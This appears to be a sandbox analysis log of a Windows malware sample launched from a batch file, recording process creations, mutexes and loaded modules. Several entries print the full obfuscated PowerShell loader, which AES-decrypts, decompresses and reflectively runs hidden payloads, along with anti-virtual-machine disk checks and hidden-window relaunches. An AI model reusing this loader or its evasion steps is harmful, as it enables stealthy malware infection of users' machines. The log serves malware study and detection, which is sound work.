Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 34_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 34_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20241003 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6983353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\5387306
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\8404857
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3852
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kp2q3ph.fnd.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
